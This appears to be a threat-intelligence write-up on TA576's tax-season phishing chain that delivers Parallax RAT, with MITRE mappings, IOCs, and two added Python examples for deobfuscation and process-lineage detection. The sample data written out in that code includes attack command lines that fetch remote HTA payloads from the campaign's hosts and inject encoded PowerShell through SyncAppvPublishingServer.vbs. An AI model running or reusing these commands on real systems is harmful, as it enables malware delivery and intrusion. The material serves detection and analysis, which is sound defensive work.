Keypoints
- TA576 resumed tax-season campaigns in Jan 2024 using compromised accounts and reply-to addresses pointing to attacker-controlled domains.
- Initial replies are met with malicious Google Firebase (web.app) URLs that redirect to ZIP archives containing LNK shortcut files.
- The shortcut (LNK) abuses the signed SyncAppvPublishingServer.vbs script (a LOLBAS command-injection technique) to run encoded PowerShell, which launches mshta to retrieve an HTA payload.
- The HTA runs PowerShell to AES-decrypt and decompress another command that downloads and executes an EXE in %appdata%, using obfuscation and multi-stage scripting.
- The final executable uses the “Heaven’s Gate” evasion technique and installs Parallax RAT, which contacts a C2 at 193[.]142[.]146[.]101:20190.
- Indicators include multiple web.app redirect URLs, HTA hosts, an EXE URL (sew1.exe), a Parallax RAT SHA256, and the listed C2 IP:port.
MITRE Techniques
- [T1218] System Binary Proxy Execution (LOLBAS; abuse of a signed script such as SyncAppvPublishingServer.vbs is also catalogued under T1216 System Script Proxy Execution) – Use of a legitimate script for proxy execution: ‘ran encoded PowerShell via the SyncAppvPublishingServer.vbs LOLBAS inject.’
- [T1218.005] Mshta – Launching HTML Application to execute payload: ‘The PowerShell command launched Mshta to run the HTML application (HTA) payload from a provided URL.’
- [T1059.001] PowerShell – Scripted execution and decryption stages: ‘The HTA payload ran a PowerShell command to AES decrypt and decompress another command that downloaded an executable to the %appdata% folder and ran it.’
- [T1204.002] User Execution: Malicious File (LNK) – Shortcut file used to trigger further execution: ‘it redirected to the download of a zipped shortcut (LNK) file. If this shortcut was executed, it ran encoded PowerShell…’
- [T1105] Ingress Tool Transfer – Staging and transfer of the final payload: ‘downloaded an executable to the %appdata% folder and ran it.’
- [T1027] Obfuscated Files or Information – Use of encoding/obfuscation in scripts: ‘encoded PowerShell’ and ‘Obfuscated PowerShell’ used in multiple stages.
Indicators of Compromise
- [Email address] TA576 reply-to address used in campaigns – bvillegas@mountain-alliance[.]com
- [URLs] Firebase/web.app redirect targets – redirectit1[.]web[.]app, uploadfile2024[.]web[.]app/2023-FILES-MY1040-w2[.]zip (and other web.app redirects)
- [HTA/host] HTA payload hosting examples – g3w2host[.]web[.]app/G3w2, charitytechw[.]com/Knitste12
- [Executable URL] Final payload location – charitytechw[.]com/sew1[.]exe
- [C2 IP] Parallax RAT command-and-control – 193[.]142[.]146[.]101:20190
- [File hash] Parallax RAT SHA256 – f6c901d8959b26428c5fbb9b0c4a18be2057bb4d22e85bfe2442c0a8744a9ff6
TA576’s attack chain begins with low-volume tax-themed email lures sent from compromised accounts, with a reply-to header that points at an attacker-controlled domain. Targets who respond receive a Firebase (web.app) URL that redirects to a ZIP containing a shortcut (LNK) file. Executing the shortcut abuses the signed SyncAppvPublishingServer.vbs script, which passes its argument into a PowerShell command line without sanitising it, so a ';' in the argument injects attacker-chosen encoded PowerShell.
The PowerShell stage first rebuilds its obfuscated strings: the shortcut stores the command as a sequence of integers, each a character code plus a constant that varies from sample to sample, and subtracts the constant at run time before converting the values back to characters. It then launches mshta to fetch an HTA payload from the attacker hosts. The HTA executes PowerShell that AES-decrypts and decompresses an additional command; that command downloads an executable into %appdata% and launches it, with obfuscation layered across every script stage to hinder analysis.
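The subtraction-constant obfuscation described above, as an added Python decoder (example code written for this page, not Proofpoint's tooling): because the constant differs per sample, and may be computed rather than written literally in the script, the decoder brute-forces it instead of trusting the visible `-37`, keeping only constants that map every number into printable ASCII and ranking the candidates by expected tokens. The two encoded samples are constructed here from the HTA hosts in the IOC list (an `http://` scheme is assumed) with invented constants; nothing about them comes from a real TA576 shortcut.

```python
import re

# Tokens an analyst expects in the recovered command; they rank candidate constants.
EXPECTED_TOKENS = ("mshta", "powershell", "http", "hta", "iex")


def extract_numbers(snippet: str) -> list:
    """Return the longest comma-separated run of integers found in a PowerShell snippet."""
    runs = re.findall(r"\d+(?:\s*,\s*\d+)+", snippet)
    if not runs:
        raise ValueError("no numeric array found in snippet")
    return [int(n) for n in re.split(r"\s*,\s*", max(runs, key=len))]


def candidate_constants(numbers: list) -> range:
    """Constants k for which every n - k lands in printable ASCII (0x20..0x7e)."""
    return range(max(numbers) - 0x7E, min(numbers) - 0x20 + 1)


def score(text: str) -> int:
    """Crude plausibility score: how many expected tokens the candidate plaintext contains."""
    t = text.lower()
    return sum(t.count(tok) for tok in EXPECTED_TOKENS)


def recover_command(snippet: str) -> tuple:
    """Brute-force the subtraction constant and return (constant, plaintext)."""
    numbers = extract_numbers(snippet)
    best = (0, None, None)
    for k in candidate_constants(numbers):
        text = "".join(chr(n - k) for n in numbers)
        s = score(text)
        if s > best[0]:
            best = (s, k, text)
    if best[1] is None:
        raise ValueError("no constant yields a recognisable command")
    return best[1], best[2]


def _encode(plaintext: str, k: int) -> str:
    """Build a snippet in the shape the report describes (constructed, not a real LNK)."""
    nums = ",".join(str(ord(c) + k) for c in plaintext)
    return f"[string]::Join('',[char[]](({nums})|%{{$_-{k}}}))"


# Constructed samples: the mshta stage from the write-up, using HTA hosts from the IOC
# list, encoded with two different invented constants (the report says it varies).
SAMPLE_A = _encode("mshta http://g3w2host.web.app/G3w2", 37)
SAMPLE_B = _encode("mshta http://charitytechw.com/Knitste12", 113)

if __name__ == "__main__":
    for sample in (SAMPLE_A, SAMPLE_B):
        k, cmd = recover_command(sample)
        print(f"constant={k}  command={cmd}")
```

The printable-range filter alone leaves several neighbouring constants (each shifts the whole string by one), which is why the token score is needed; for a real sample, extend `EXPECTED_TOKENS` with whatever the surrounding stage is known to call.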
The final executable employs the “Heaven’s Gate” evasion technique (a 32-bit process transitioning into 64-bit code to sidestep user-mode hooks and emulators that only follow the 32-bit path) to run Parallax RAT, which attempts a callback to a C2 at 193[.]142[.]146[.]101:20190. Detection and mitigation should focus on blocking the listed web.app redirectors and hosting domains, monitoring process lineage for LNK-triggered SyncAppvPublishingServer.vbs, PowerShell and mshta chains (encoded PowerShell and mshta fetching a remote HTA in particular), and alerting on the listed SHA256 and C2 IP:port.
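Detection logic for the LNK-triggered script-host, PowerShell and mshta chain, as an added example (written for this page, not from the Proofpoint report): it triages Sysmon-style process-creation events, decodes `-EncodedCommand` arguments (base64 of UTF-16LE text) to see what they launch, and correlates parent/child lineage so that a remote-HTA mshta descending from a SyncAppvPublishingServer.vbs script host is reported as one chain rather than three separate hits. The events are constructed; the assumption that the shortcut runs the script via wscript.exe, and the collapsing of the intermediate PowerShell that the script itself spawns into a single event, are simplifications made for the example.

```python
import base64
import re
from typing import List, Optional

ENCODED_FLAG = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
REMOTE_URL = re.compile(r"(?i)\bhttps?://\S+")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
LOLBAS_SCRIPT = "syncappvpublishingserver.vbs"


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE text; return the plaintext or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_event(ev: dict) -> List[str]:
    """Per-event findings; an empty list means nothing in this event is suspicious."""
    image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
    findings = []
    if image in SCRIPT_HOSTS and LOLBAS_SCRIPT in cmd.lower():
        findings.append("SyncAppvPublishingServer.vbs run by a script host")
        if re.search(r'"\s*\w*\s*;', cmd):  # ';' after the server name injects PowerShell
            findings.append("vbs argument contains ';' (command injection)")
    if image in POWERSHELL:
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append("encoded command decodes to: " + decoded[:60])
            if "mshta" in decoded.lower():
                findings.append("encoded PowerShell launches mshta")
        if parent in SCRIPT_HOSTS:
            findings.append("PowerShell spawned by a script host")
    if image == "mshta.exe" and REMOTE_URL.search(cmd):
        findings.append("mshta fetching a remote HTA")
        if parent in POWERSHELL:
            findings.append("mshta spawned by PowerShell")
    return findings


def find_chains(events: List[dict]) -> List[List[str]]:
    """Walk parent GUIDs from each remote-HTA mshta back to a SyncAppv script host."""
    by_guid = {e["guid"]: e for e in events}
    chains = []
    for ev in events:
        if basename(ev["image"]) != "mshta.exe" or not REMOTE_URL.search(ev["cmdline"]):
            continue
        lineage, cur = [ev], ev
        while cur["parent_guid"] in by_guid:
            cur = by_guid[cur["parent_guid"]]
            lineage.append(cur)
        names = [basename(x["image"]) for x in lineage]
        has_ps = any(n in POWERSHELL for n in names)
        has_lolbas = any(n in SCRIPT_HOSTS and LOLBAS_SCRIPT in x["cmdline"].lower()
                         for n, x in zip(names, lineage))
        if has_ps and has_lolbas:
            chains.append(list(reversed(names)))  # root-first order
    return chains


def _enc(cmd: str) -> str:
    """Encode a command the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(cmd.encode("utf-16le")).decode()


# Constructed Sysmon-style events (not real telemetry). Lineage is simplified: the
# PowerShell that SyncAppvPublishingServer.vbs itself spawns is collapsed into event p2.
SAMPLE_EVENTS = [
    {"guid": "p1", "parent_guid": "p0", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n; powershell -w hidden -e '
                + _enc("mshta http://g3w2host.web.app/G3w2") + '"'},
    {"guid": "p2", "parent_guid": "p1", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -e " + _enc("mshta http://g3w2host.web.app/G3w2")},
    {"guid": "p3", "parent_guid": "p2", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://g3w2host.web.app/G3w2"},
    {"guid": "p4", "parent_guid": "p0", "parent": r"C:\Windows\explorer.exe",  # benign admin script
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"guid": "p5", "parent_guid": "p0", "parent": r"C:\Windows\explorer.exe",  # benign local HTA
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\ui.hta"'},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["guid"], triage_event(ev))
    print("chains:", find_chains(SAMPLE_EVENTS))
```

The two benign events exist to show the false-positive boundary: PowerShell run with `-File` from explorer.exe and mshta opening a local .hta produce no findings, while the chain is flagged at each stage and once more as a correlated lineage.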
Read more: https://www.proofpoint.com/us/blog/threat-insight/security-brief-tis-season-tax-hax